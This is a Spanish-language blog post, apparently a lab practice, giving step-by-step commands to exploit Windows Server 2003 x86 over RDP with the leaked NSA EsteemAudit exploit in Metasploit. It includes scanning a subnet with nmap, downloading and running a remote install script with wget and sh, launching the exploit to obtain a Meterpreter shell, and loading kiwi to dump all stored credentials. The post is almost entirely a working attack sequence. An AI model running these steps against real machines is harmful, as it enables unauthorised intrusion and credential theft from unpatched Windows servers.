Explotando EsteemAudit en Windows 2003 x86 con EsteemAudit-2.1.0.exe desde Metasploit

La práctica consiste en explotar un Windows 2003 x86 con los exploits filtrados de la NSA desde Metasploit. La práctica incluye la instalación del ejecutable original de EsteemAudit-2.1.0.exe.

1. Identifica en que rango esta la máquina virtual desde Kali:

root@kali:~# ifconfig eth0

(el rango debe verse similar a 192.168.179.XXX)

2. Escanea la red e identifica la máquina virtual en el rango:

root@kali:~# nmap -O 192.168.179.*

3. Instalando EsteemAudit-2.1.0.exe en Metasploit con mi script:

wget https://gist.githubusercontent.com/hkm/fe705e3ff9d0df3f6eaaafb44aeca4d6/raw/ce275bc93e0d54adbc5939142a960e092a85c501/esteemaudit-install.sh

3b. Si no pueden copiar la liga, entren a https://gist.github.com/hkm/ y den click derecho en el boton [Raw] y seleccionen “Save Link As…”

4. Ejecuten el archivo con los siguiente comando en el Terminal:

root@kali:~# sh esteemaudit-install.sh

5. Entramos a Metasploit:

root@kali:~# msfconsole

6. Busca la ruta del exploit de ESTEEMAUDIT:

msf》 search esteem

7. Selecciona el exploit con el siguiente comando:

msf》 use exploits/windows/rdp/esteemaudit

8. Mira la información del exploit utilizando:

msf exploit(esteemaudit) 》 show info

9. Pon la dirección IP del Windows2003-x86:

msf exploit(esteemaudit) 》 set RHOST AQUÍLADIRECCIÓNIP

10. Ejecuta el exploit:

msf exploit(esteemaudit) 》 exploit

11. Recibiremos una shell en forma de Meterpreter, para ver su información escribimos:

meterpreter 》 sysinfo

12. Cargamos el módulo kiwi para obtener credenciales:

meterpreter 》 load kiwi

13. Listamos las credenciales de la computadora:

meterpreter 》 creds_all

 

Share
Esta entrada fue publicada en Videos, Vulnerabilidades. Guarda el enlace permanente.

Los comentarios están cerrados.